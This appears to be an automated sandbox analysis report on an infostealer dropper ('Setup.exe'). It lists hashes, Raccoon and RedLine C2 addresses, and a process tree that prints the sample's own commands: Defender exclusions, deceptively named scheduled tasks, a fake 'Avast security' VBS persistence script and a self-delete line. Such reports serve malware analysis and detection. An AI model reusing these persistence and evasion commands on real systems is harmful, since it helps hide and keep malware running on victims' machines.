Analysis

  • max time kernel
    118s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2022 19:53

General

  • Target

    Setup.exe

  • Size

    812.1MB

  • MD5

    97432769d9c069e9d916cca622d3e136

  • SHA1

    821748178afd4e72ce68e37bca575327e2c15074

  • SHA256

    7f9684b6297bf11ba15105902412e453afd13c904e8e0121d9d8ef834b7e95d9

  • SHA512

    4641d432a53c437fed97313b8c13af504b681580d37fc25a1e7ddc1c787283d5478ea78d3adacc850f022814a14a160932e135f001096b7ab93dc7c1c3277dd7

  • SSDEEP

    6144:LDKW1Lgbdl0TBBvjc/YrWNjk2ZHXKsDDki/jsRzXN8fZfjLx7zz:/h1Lk70TnvjcAb2ZHXhF/Sz96fnx

Malware Config

Extracted

Family

raccoon

Botnet

55141fdba30e9c28fe0ae2e082b22897

C2

http://45.15.156.31/

rc4.plain

Extracted

Family

redline

C2

81.161.229.143:27938

Attributes
  • auth_value

    6687e352a0604d495c3851d248ebf06f

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • YTStealer

    YTStealer is a malware designed to steal YouTube authentication cookies.

  • YTStealer payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      2⤵
        PID:2616
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3632
        • C:\Users\Admin\AppData\Local\Temp\7GcK47Xw.exe
          "C:\Users\Admin\AppData\Local\Temp\7GcK47Xw.exe"
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2352
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\build.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\build.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1248
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Avast corporation" : regInfo.Description="Avast security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\build.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Avast security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > "C:\Users\Admin\AppData\Local\Temp\tmp70B6.vbs" & cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp70B6.vbs" & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp70B6.vbs" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4988
              • C:\Windows\system32\cscript.exe
                cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp70B6.vbs"
                6⤵
                  PID:2316
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              4⤵
                PID:4256
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                4⤵
                  PID:3984
              • C:\Users\Admin\AppData\Local\Temp\GgJKtL1j.exe
                "C:\Users\Admin\AppData\Local\Temp\GgJKtL1j.exe"
                3⤵
                • Executes dropped EXE
                PID:4208
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\GgJKtL1j.exe
                  4⤵
                    PID:4064
                    • C:\Windows\system32\choice.exe
                      choice /C Y /N /D Y /T 0
                      5⤵
                        PID:2284
                  • C:\Users\Admin\AppData\Local\Temp\m3msHNpw.exe
                    "C:\Users\Admin\AppData\Local\Temp\m3msHNpw.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3904
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4924
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        5⤵
                          PID:2448
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4412
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4608
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408
                      • C:\ProgramData\Dllhost\dllhost.exe
                        "C:\ProgramData\Dllhost\dllhost.exe"
                        4⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5016
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                          5⤵
                            PID:4400
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                              6⤵
                              • Creates scheduled task(s)
                              PID:5060
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            5⤵
                              PID:1556
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                6⤵
                                • Creates scheduled task(s)
                                PID:1104
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                              5⤵
                                PID:1192
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:64
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                5⤵
                                  PID:4460
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:1180
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  5⤵
                                    PID:1340
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                      6⤵
                                      • Creates scheduled task(s)
                                      PID:3556
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                    5⤵
                                      PID:320
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:2436
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                      5⤵
                                        PID:3700
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                          6⤵
                                          • Creates scheduled task(s)
                                          PID:3464
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                        5⤵
                                          PID:2356
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                            6⤵
                                            • Creates scheduled task(s)
                                            PID:528
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1360" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                          5⤵
                                            PID:3604
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1360" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                              6⤵
                                              • Creates scheduled task(s)
                                              PID:3728
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9608" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                            5⤵
                                              PID:3640
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9608" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:2748
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk6328" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                              5⤵
                                                PID:1236
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk6328" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                  6⤵
                                                  • Creates scheduled task(s)
                                                  PID:5044
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                5⤵
                                                  PID:4248
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                    6⤵
                                                    • Creates scheduled task(s)
                                                    PID:3608
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
                                                  5⤵
                                                    PID:4444
                                                    • C:\Windows\SysWOW64\chcp.com
                                                      chcp 1251
                                                      6⤵
                                                        PID:4600
                                                • C:\Users\Admin\AppData\Local\Temp\x4ojPSUv.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\x4ojPSUv.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:1296
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell "" "Get-WmiObject Win32_PortConnector"
                                                    4⤵
                                                      PID:3616

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Registry Run Keys / Startup Folder

                                              1
                                              T1060

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              1
                                              T1112

                                              Credential Access

                                              Credentials in Files

                                              2
                                              T1081

                                              Discovery

                                              Query Registry

                                              1
                                              T1012

                                              System Information Discovery

                                              2
                                              T1082

                                              Collection

                                              Data from Local System

                                              2
                                              T1005

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\ProgramData\Dllhost\dllhost.exe
                                                Filesize

                                                61KB

                                                MD5

                                                d5a003e50c058f6474915597fe27bfea

                                                SHA1

                                                715a1a2b9d1ba6c886d2039089b94e96ea8bb687

                                                SHA256

                                                a3a9409c768e578c2beb391daf4e0fb697031be3942aff8402624cce659fcb07

                                                SHA512

                                                af591a1bc6e26d625f328f5d45ea31ce0e04b55b6d9ca614cd811c555a7defddbabaac48599e54ead0f9c46b3e33e7bae5c6013881daf560b4369f1f214499a5

                                              • C:\ProgramData\Dllhost\dllhost.exe
                                                Filesize

                                                61KB

                                                MD5

                                                d5a003e50c058f6474915597fe27bfea

                                                SHA1

                                                715a1a2b9d1ba6c886d2039089b94e96ea8bb687

                                                SHA256

                                                a3a9409c768e578c2beb391daf4e0fb697031be3942aff8402624cce659fcb07

                                                SHA512

                                                af591a1bc6e26d625f328f5d45ea31ce0e04b55b6d9ca614cd811c555a7defddbabaac48599e54ead0f9c46b3e33e7bae5c6013881daf560b4369f1f214499a5

                                              • C:\ProgramData\SystemFiles\sys_rh.bin
                                                Filesize

                                                1KB

                                                MD5

                                                b2709bd7718f19e9dd4b2d1023fcc270

                                                SHA1

                                                d3dd2e8a3c0084998b4aca5d8e922b12b9108805

                                                SHA256

                                                33253eb25befb2899c1b952c9452b45b22f447286151f599b2e569485a5799ad

                                                SHA512

                                                34a225d8f91f16287389a95011be8b290f8e437681d6e534d9a4d1a5916ef690169f2127eba1d86afe3ec3027a67ec82db11e926c09d83a18b89ee059ffcfe9f

                                              • C:\Users\Admin\AppData\LocalLow\mozglue.dll
                                                Filesize

                                                612KB

                                                MD5

                                                f07d9977430e762b563eaadc2b94bbfa

                                                SHA1

                                                da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

                                                SHA256

                                                4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

                                                SHA512

                                                6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

                                              • C:\Users\Admin\AppData\LocalLow\nss3.dll
                                                Filesize

                                                1.9MB

                                                MD5

                                                f67d08e8c02574cbc2f1122c53bfb976

                                                SHA1

                                                6522992957e7e4d074947cad63189f308a80fcf2

                                                SHA256

                                                c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

                                                SHA512

                                                2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

                                              • C:\Users\Admin\AppData\LocalLow\sqlite3.dll
                                                Filesize

                                                1.0MB

                                                MD5

                                                dbf4f8dcefb8056dc6bae4b67ff810ce

                                                SHA1

                                                bbac1dd8a07c6069415c04b62747d794736d0689

                                                SHA256

                                                47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

                                                SHA512

                                                b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                Filesize

                                                1KB

                                                MD5

                                                4280e36a29fa31c01e4d8b2ba726a0d8

                                                SHA1

                                                c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                                                SHA256

                                                e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                                                SHA512

                                                494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                Filesize

                                                53KB

                                                MD5

                                                06ad34f9739c5159b4d92d702545bd49

                                                SHA1

                                                9152a0d4f153f3f40f7e606be75f81b582ee0c17

                                                SHA256

                                                474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                                                SHA512

                                                c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                16KB

                                                MD5

                                                53a53f8f7753232584b90d52a1ac8a56

                                                SHA1

                                                35d25454b453003be57fc2d23c8ed1a1a947a4e7

                                                SHA256

                                                783ee13d66d010a814c0102926e6573ddddd1a87da2fed5af6e2469f178cdfae

                                                SHA512

                                                741b9b223a4306be8eada91e7efce58dc72fa1b9d85b9849ade1f730e999d53304b2530abd8021ee14815ae958fd04f8d50eed02d1b5711a55955c92e84e6595

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                18KB

                                                MD5

                                                0793611dfd80b974300703d9f9577887

                                                SHA1

                                                223fe9b9d8e1c7b67ed65c829837cb19d8bbfb99

                                                SHA256

                                                67c807aad70a3705d39bd7f5aa543b8b9e834294375ed00d457d1de359c0c090

                                                SHA512

                                                cfad8473120524eb9bbac9724db1de1d7856ba269e4c35e818eab0724995fc5c77f01d80d23e302642bb27e179493b2c78d7f47b868062d6872fb69172ecdade

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                18KB

                                                MD5

                                                b541aadea0864f0c67b325b40ae27128

                                                SHA1

                                                799afb793042e52ea154933ddc70ea78d9432d84

                                                SHA256

                                                469318542edc09b394831e9377cf69d690520b8c72e040d85e28fae24f2a51ff

                                                SHA512

                                                873f9aaba992046aa56309dd2af80e665e5b623f448c084899850d31c96d15b5931f11c912bdaddde75f5ff08e68b3196fc16d8abb5b87b0a012c803e2426d95

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                18KB

                                                MD5

                                                2acfb05f31f78c802e36e0865608695c

                                                SHA1

                                                fc5af2164e81f4454b334bd49f698625e7381a05

                                                SHA256

                                                a789bb512698caf068864187a294b7fde135ea2a3edc4327559d724b8ddf53dd

                                                SHA512

                                                eae7218015d8acde5442f25c91b4fd2fb1db660d4544105e7c25ef72a01102ef1cd107eb83856450a11b6661ac4e2ed731d6b99ca548fce608ec418e7a83e805

                                              • C:\Users\Admin\AppData\Local\Temp\7GcK47Xw.exe
                                                Filesize

                                                656KB

                                                MD5

                                                449e9f0ed1595935ec02a36b6e502313

                                                SHA1

                                                65c99d85fa46e05009f363885e34586f64335f23

                                                SHA256

                                                1ac13810fc9aac7bf6f6ce4e4dcb90f69a3953d70a5d5f1ba1a054accf395024

                                                SHA512

                                                2b2b4ae1d3f0d6b45f7a6934990dbd07bf5d6b85a3ebb37fa2fcbf5e063a12a1f68677e6e0ef02a804a532cfd1f973417c7fd4edb6d9d2468f8dc290c2584e22

                                              • C:\Users\Admin\AppData\Local\Temp\7GcK47Xw.exe
                                                Filesize

                                                656KB

                                                MD5

                                                449e9f0ed1595935ec02a36b6e502313

                                                SHA1

                                                65c99d85fa46e05009f363885e34586f64335f23

                                                SHA256

                                                1ac13810fc9aac7bf6f6ce4e4dcb90f69a3953d70a5d5f1ba1a054accf395024

                                                SHA512

                                                2b2b4ae1d3f0d6b45f7a6934990dbd07bf5d6b85a3ebb37fa2fcbf5e063a12a1f68677e6e0ef02a804a532cfd1f973417c7fd4edb6d9d2468f8dc290c2584e22

                                              • C:\Users\Admin\AppData\Local\Temp\GgJKtL1j.exe
                                                Filesize

                                                4.0MB

                                                MD5

                                                e4d3f5b6e53c0188e6ff2081b87cbd82

                                                SHA1

                                                a43c60c08f67a90aa6836d66de8bdf0179f4d9f8

                                                SHA256

                                                2f3c5db2ebcc3780f9507e572a26e332505905a1b9c9b3086e689ccbe463546b

                                                SHA512

                                                9ea5c68a1e9cc8409efc41edac3cc282aa27bbae59cebf382347d2a2f824d06a284f07f6455ea3c35035d89f66434a1c1078f9d0560404f8257dc84d77afb060

                                              • C:\Users\Admin\AppData\Local\Temp\GgJKtL1j.exe
                                                Filesize

                                                4.0MB

                                                MD5

                                                e4d3f5b6e53c0188e6ff2081b87cbd82

                                                SHA1

                                                a43c60c08f67a90aa6836d66de8bdf0179f4d9f8

                                                SHA256

                                                2f3c5db2ebcc3780f9507e572a26e332505905a1b9c9b3086e689ccbe463546b

                                                SHA512

                                                9ea5c68a1e9cc8409efc41edac3cc282aa27bbae59cebf382347d2a2f824d06a284f07f6455ea3c35035d89f66434a1c1078f9d0560404f8257dc84d77afb060

                                              • C:\Users\Admin\AppData\Local\Temp\m3msHNpw.exe
                                                Filesize

                                                56KB

                                                MD5

                                                2ccf48338071a18c1a7377bf30831c8c

                                                SHA1

                                                31acd7880c6c73fe496574d082cb3a35ab1086f0

                                                SHA256

                                                5a2bd9fbb6c7cfde9dbdd52697478996129a8e7cd580f094afe747941d259718

                                                SHA512

                                                d17c486cd6ba7d66e1fb2e74e6316c61dd2c999a2dfbcb4628966ed7c6afe70d29dc43da450063b4ba046582d420ff0fc8a3a0d9da114a2536739d463a59c75d

                                              • C:\Users\Admin\AppData\Local\Temp\m3msHNpw.exe
                                                Filesize

                                                56KB

                                                MD5

                                                2ccf48338071a18c1a7377bf30831c8c

                                                SHA1

                                                31acd7880c6c73fe496574d082cb3a35ab1086f0

                                                SHA256

                                                5a2bd9fbb6c7cfde9dbdd52697478996129a8e7cd580f094afe747941d259718

                                                SHA512

                                                d17c486cd6ba7d66e1fb2e74e6316c61dd2c999a2dfbcb4628966ed7c6afe70d29dc43da450063b4ba046582d420ff0fc8a3a0d9da114a2536739d463a59c75d

                                              • C:\Users\Admin\AppData\Local\Temp\tmp70B6.vbs
                                                Filesize

                                                1KB

                                                MD5

                                                557fc4a580a8b09428014e562c1be8c4

                                                SHA1

                                                4116471bcf6f4ccb784422468065d99de15dfff0

                                                SHA256

                                                efe0c611e82da6ed00e304123a50aadac6ab8e8c50ef71c02527864f906ab1ee

                                                SHA512

                                                d0c68dd3daec12820555fa79ceaf580eb202e01980623f4d4c741ee8a80a562b4f98981c1c0577fcedd6b40354b9909e99ec67051daf7ec47abcc248f559c439

                                              • C:\Users\Admin\AppData\Local\Temp\x4ojPSUv.exe
                                                Filesize

                                                5.1MB

                                                MD5

                                                3e2922711ccfb0d4c63bc2e1ac3962cb

                                                SHA1

                                                c0080d77f23d9ba6aea56bf808e7047564ddff51

                                                SHA256

                                                6e4581639b79846f73463632b751fbfb6568b3f3d12d14e1cf9a9f4f818d7a56

                                                SHA512

                                                47de0b4c5a20aeb8a777f1dc8f7c3fa9264d472d229727c97a12d77ac06f99000f830c73f261d3ad529e91ef9b4dcf944263292f4e69084cd0cd66826091d8f4

                                              • C:\Users\Admin\AppData\Local\Temp\x4ojPSUv.exe
                                                Filesize

                                                5.1MB

                                                MD5

                                                3e2922711ccfb0d4c63bc2e1ac3962cb

                                                SHA1

                                                c0080d77f23d9ba6aea56bf808e7047564ddff51

                                                SHA256

                                                6e4581639b79846f73463632b751fbfb6568b3f3d12d14e1cf9a9f4f818d7a56

                                                SHA512

                                                47de0b4c5a20aeb8a777f1dc8f7c3fa9264d472d229727c97a12d77ac06f99000f830c73f261d3ad529e91ef9b4dcf944263292f4e69084cd0cd66826091d8f4

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\build.exe
                                                Filesize

                                                81KB

                                                MD5

                                                6667d95c75b6d1bd114d06194bba63cf

                                                SHA1

                                                3f91ab97fbac261745b60e57a208538b00fc0bb8

                                                SHA256

                                                c6f186992f252d82f1473bfe12a4323ae0de025a73ddd19b27ceb0f68e93f695

                                                SHA512

                                                2a2469cc5e73d21ca7eba7d90c37565028b7bb913f331a49211ec208366ab2671c74e85389ae12edec10f67dd70413b766166e4cc4fe9c6c40cd5c40bae61bda

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\build.exe
                                                Filesize

                                                81KB

                                                MD5

                                                6667d95c75b6d1bd114d06194bba63cf

                                                SHA1

                                                3f91ab97fbac261745b60e57a208538b00fc0bb8

                                                SHA256

                                                c6f186992f252d82f1473bfe12a4323ae0de025a73ddd19b27ceb0f68e93f695

                                                SHA512

                                                2a2469cc5e73d21ca7eba7d90c37565028b7bb913f331a49211ec208366ab2671c74e85389ae12edec10f67dd70413b766166e4cc4fe9c6c40cd5c40bae61bda

                                              • memory/64-227-0x0000000000000000-mapping.dmp
                                              • memory/320-214-0x0000000000000000-mapping.dmp
                                              • memory/408-204-0x0000000000000000-mapping.dmp
                                              • memory/408-210-0x0000000073C00000-0x0000000073C4C000-memory.dmp
                                                Filesize

                                                304KB

                                              • memory/528-231-0x0000000000000000-mapping.dmp
                                              • memory/840-138-0x00000000023D0000-0x0000000002406000-memory.dmp
                                                Filesize

                                                216KB

                                              • memory/840-139-0x0000000004E40000-0x0000000005468000-memory.dmp
                                                Filesize

                                                6.2MB

                                              • memory/840-140-0x00000000055E0000-0x0000000005646000-memory.dmp
                                                Filesize

                                                408KB

                                              • memory/840-141-0x00000000056C0000-0x0000000005726000-memory.dmp
                                                Filesize

                                                408KB

                                              • memory/840-137-0x0000000000000000-mapping.dmp
